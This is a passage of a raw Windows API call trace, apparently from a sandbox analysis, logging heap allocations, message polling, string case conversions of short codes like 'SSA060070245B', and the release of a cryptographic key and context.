(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.726] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.726] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.727] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.727] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.727] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.727] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.735] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.736] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0198.736] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.736] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0198.736] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.736] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.737] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.737] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.737] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.737] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.737] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.737] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0198.738] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.738] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.738] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.738] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.738] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.738] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.739] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.739] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.739] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.739] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.739] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.739] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.739] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.739] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.739] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.740] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.740] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.740] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.740] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.740] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.740] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.741] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.741] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.741] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.741] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.741] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.741] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.741] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.741] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.742] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.744] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.744] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.744] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.744] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.745] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 